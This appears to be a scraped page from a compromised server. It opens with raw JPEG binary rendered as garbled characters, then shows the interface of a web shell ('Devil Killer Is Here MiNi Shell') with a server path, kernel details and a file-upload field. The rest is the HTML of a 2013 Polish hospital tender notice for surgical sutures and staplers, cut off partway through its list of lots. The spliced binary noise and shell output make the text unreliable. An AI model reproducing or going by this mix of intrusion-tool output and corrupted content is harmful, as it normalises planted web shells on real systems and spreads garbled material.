JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/464366-N-2013.html

<p class="kh_header"><b>Kamienna Góra: Dostawa materiałów szewnych i staplerów 
 na potrzeby Powiatowego Centrum Zdrowia 
w Kamiennej Górze Sp. z o. o.</b><br>
<b>Numer ogłoszenia: 464366 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 75 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcz.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów szewnych i staplerów 
 na potrzeby Powiatowego Centrum Zdrowia 
w Kamiennej Górze Sp. z o. o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów szewnych i staplerów. 
Zakres zamówienia obejmuje 13 części: 

PAKIET NR 1 - NICI NIEWCHŁANIALNE, PLECIONE, POWLEKANE SILIKONEM, POLIESTROWE, SYNTETYCZNE BEZ IGŁY 
PAKIET NR 2 - NICI NIEWCHŁANIALNE, PLECIONE, POWLEKANE, SILIKONEM, POLIESTROWE, SYNTETYCZNE 
PAKIET NR 3 - NICI NIEWCHŁANIALNE, MONOFILAMENTOWE, POLIAMIDOWE, SYNTETYCZNE 
PAKIET NR 4 - NICI PLECIONE  Z KOPOLIMERU GLIKOLIDU Z IGŁĄ ODWROTNIE TNĄCĄ 
PAKIET NR 5 - NICI PLECIONE Z KOPOLIMERU GLIKOLIDU Z IGŁĄ OKRĄGŁĄ
PAKIET NR 6 - NICI PLECIONE Z  KWASU POLIGLIKOLOWEGO  POWLEKANE POLIGLIKONATEM
PAKIET NR 7 - NICI MONOFLILAMENTOWE Z POLIPDIOKSANONU, SYNTETYCZNE 
PAKIET NR 8 - NICI MONOFLILAMENTOWE, SYNTETYCZNE 
PAKIET NR 9 - NICI  MONOFILAMENTOWE Z GLIKONATU, SYNTETYCZNE 
PAKIET NR 10 - NICI  NIEWCHŁANIALNE, MONOFILAMENTOWE Z IGŁĄ OKRĄGŁĄ
PAKIET NR 11 - PRODUKTY SPECJALISTYCZNE
PAKIET NR 12 - NICI    MONOFILAMENTOWE Z  GLIKONATU 
PAKIET NR 13 - STAPLERY 
 Szczegółowy asortyment   oraz ich ilości określone są w FORMULARZU CENOWYM.
Podane ilości asortymentu mają charakter orientacyjny. Wykonawcy nie będzie przysługiwało roszczenie o realizację wskazanych ilości w przypadku ich nie wyczerpania wraz z upływem daty obowiązywania umowy.
Przedmiot zamówienia będzie dostarczany sukcesywnie, zgodnie z zapotrzebowaniem Zamawiającego przez okres 36  miesięcy licząc od dnia podpisania umowy.
 Termin realizacji dostawy towaru: 5  dni;
Wykonawca zapewni minimalny termin płatności: 30 dni od dnia wystawienia  faktury Vat;
Dostawa towaru będzie się odbywać na koszt i ryzyko transportem dostawcy. 
Wykonawca zapewni stałość cen netto przez okres trwania umowy -  36 miesięcy  z wyjątkiem zmiany stawki podatku Vat.

Warunki podstawowe / minimalne  dla przedmiotu zamówienia:
winien odpowiadać parametrom i opisowi podanemu w FORMULARZU CENOWYM lub być równoważne (poprzez wyroby równoważne Zamawiający rozumie wyroby których skład, rozmiar i parametry mieszczą się w zakresie podanych w opisie przedmiotu zamówienia tolerancjach); 
oferowane nici winny spełniać wszystkie wymagania stawiane nowoczesnym  materiałom szewnym oraz cechować się następującymi parametrami techniczno - eksploatacyjnymi: igły winny się  nie giąć i nie tępić, igły i nici winny zapewnić łatwe przechodzenie przez tkanki  i zapewniać minimalną  traumatyzację, igły i nici winny posiadać dobre właściwości mechaniczne (być elastyczne, podatne i wygodne w trakcie wiązania,  nie powodować nie pożądanych odczynów tkankowych, winny posiadać dobrą ostrość oraz łatwe przenikanie przez szyte tkanki, winny być wytrzymałe);
parametry  techniczne  nici:  
- wymaga się aby nitki były pakowane w  podwójne w szczelnie  sterylnie zamknięte saszetki - saszetka wewnętrzna szczelnie zamknięta; 
- na saszetce opis rodzaju nici;
- nie dopuszcza się odchyleń w krzywiźnie koła;
 - dopuszcza się odchylania w  długości igły i nitki +/- 10%;
być dopuszczone do obrotu/zarejestrowane zgodnie z obowiązującymi  przepisami  prawa (zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010r.  (Dz. U. 2010, nr 107, poz. 679) Wykonawcy składają dokumenty dopuszczenia do obrotu - używania na terenie RP  na oferowane wyroby medyczne zgodnie z ich klasą  (deklarację zgodności lub CE zgodnie z klasą wyrobu)  bądź oświadczenie, że oferowane produkty lecznicze posiadają aktualne dokumenty dopuszczające do obrotu na terytorium Rzeczypospolitej Polskiej, według wzoru: Dokument 3);
wymaga się załączenia do oferty próbek oferowanych wyrobów po  saszetce do każdej pozycji; 
towary będące przedmiotem  sprzedaży będą dostarczane Zamawiającemu w opakowaniach zabezpieczających jakość dostarczonych towarów i odpowiadających warunkom transportu, odbioru i przechowywania; zamawiany towar  powinien posiadać bezpieczny termin ważności pozwalający na jego magazynowanie i  prawidłowy odczyt - stemplowany na etykiecie pudełka,  w tym okresie firma winna gwarantować   zachowanie przez towar  pełnej wartości użytkowej, na opakowaniu winna być podana data produkcji, numer serii. Termin ważności   musi gwarantować przydatność  asortymentu do użycia w okresie nie krótszym niż 12 miesięcy od daty  zakupu  z wyjątkiem towaru o terminie ważności  krótszym;
data ważności winna być na opakowaniach oferowanych produktów tylko w przypadku konkretnych wyrobów medycznych z których właściwości wynika konieczność wskazania terminu przydatności zgodnie z pkt. 13.3 ppkt. 12 załącznika nr 1 do Rozporządzenia z dnia 3 listopada 2004r.  w sprawie wymagań zasadniczych dla wyrobów medycznych do różnego przeznaczenia (Dz. U. Nr 251, poz. 2514).
Uwaga: Zamawiający wymaga posiadania daty ważności na opakowaniach oferowanych produktów tylko w przypadku konkretnych wyrobów medycznych z których właściwości wynika konieczność wskazania terminu przydatności zgodnie z pkt. 13.3 ppkt. 12 załącznika nr 1 do Rozporządzenia z dnia 3 listopada 2004r.  w sprawie wymagań zasadniczych dla wyrobów medycznych do różnego przeznaczenia (Dz. U. Nr 251, poz. 2514)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, wykonał lub wykonuje dostawę materiałów szewnych  na potrzeby zakładów ochrony zdrowia, pomocy społecznej;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010r.  (Dz. U. 2010, nr 107, poz. 679) Wykonawcy składają dokumenty dopuszczenia do obrotu - używania na terenie RP  na oferowane wyroby medyczne zgodnie z ich klasą  (deklarację zgodności lub CE zgodnie z klasą wyrobu)  bądź oświadczenie, że oferowane produkty  posiadają aktualne dokumenty dopuszczające do obrotu na terytorium Rzeczypospolitej Polskiej,</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.1. zmiany sposobu konfekcjonowania towaru, liczby opakowań przy zastrzeżeniu braku możliwości podwyższenia cen,
1.2.   zmiany w części dotyczącej nazwy, producenta dostarczanych  towarów,
1.3.  zmiany terminy (wydłużenia) obowiązywania umowy,
1.4.   zmiany osób upoważnionych do odbioru/ kontaktów,
1.5.   zmiana rachunku bankowego i innych danych stron.
1.6.   nastąpiła zmiana danych Wykonawcy  w tym min. formy organizacyjno - prawnej,
1.7.   możliwa jest korzystna dla Zamawiającego zmiana terminu i sposobu płatności za realizację przedmiotu zamówienia,
1.8.  jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację  przedmiotu zamówienia, a w szczególności w przypadku ustawowej zmiany podatku VAT,
1.9.  wystąpi siła wyższa mająca wpływ na realizację umowy,
1.10. zaistnieje omyłka pisarska lub rachunkowa,
1.11. nieistotne zmiany umowy, 
1.12. zachodzi konieczność zmiany terminu  wykonania przedmiotu zamówienia, w przypadku, gdy nie można było tego   przewidzieć w chwili podpisania umowy,
1.13. niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego lub jest   konieczna w celu prawidłowego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowym Centrum Zdrowia w Kamiennej Górze Sp. z o. o.
ul. Bohaterów Getta 10, 58-400 Kamienna Góra
dział zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2013 godzina 10:00, miejsce: Powiatowym Centrum Zdrowia w Kamiennej Górze Sp. z o. o.
ul. Bohaterów Getta 10, 58-400 Kamienna Góra
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> NICI NIEWCHŁANIALNE, PLECIONE, POWLEKANE SILIKONEM, POLIESTROWE, SYNTETYCZNE bez igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NICI NIEWCHŁANIALNE, PLECIONE, POWLEKANE, SILIKONEM, POLIESTROWE, SYNTETYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> NICI NIEWCHŁANIALNE, MONOFILAMENTOWE, POLIAMIDOWE, SYNTETYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 12 poz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> nici plecione z kwasu poliglikolowego, powlekane poliglikonatem, syntetyczne, wchłaniające się między 60-90 dniem od zaimplantowania  z igłą odwrotnie tnącą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 9 poz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> nici plecione z kwasu poliglikolowego, powlekane poliglikonatem, syntetyczne, wchłaniające się między 60-90 dniem od zaimplantowania  z igłą okrągła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 17  poz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PLECIONE Z KWASU POLIGLIKOLOWEGO, POWLEKANE POLIGLIKONATEM, SYNTETYCZNE, WCHŁANIAJACE SIĘ MIĘDZY  60 - 90 DNIEM  OD ZAIMPLANTOWANIA BEZ IGŁY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3 poz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MONOFILAMENTOWE  Z POLIPDIOKSANONU,SYNTETYCZNE, WCHŁANIAJĄCE SIĘ MIĘDZY 180-210 DNIEM O PODTRZYMYWANIU TKANKOWYM 50% W 28-35 DNIU OD ZAIMPLANTOWANIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 5 poz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> MONOFILAMENTOWE, SYNTETYCZNE, WCHŁANIAJĄCE SIĘ po 12 miesiącach, podtrzymanie tkanowe w 50% po 3 miesiącach od zaimplantowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 poz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> MONOFILAMENTOWE  Z GLIKONATU, SYNTETYCZNE, WCHŁANIAJĄCE SIĘ MIEDZY 60-90 DNIEM OD ZAIMPLANTOWANIA, OKRES PODTRZYMYWANIA TKANKI W 50% W 14 DNIU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> NICI NIEWCHŁANIALNE, MONOFILAMENTOWE, POLIPROPYLENOWE, SYNTETYCZNE z igłą okrągłą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6 poz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PRODUKTY SPECJALISTYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 poz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.24-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
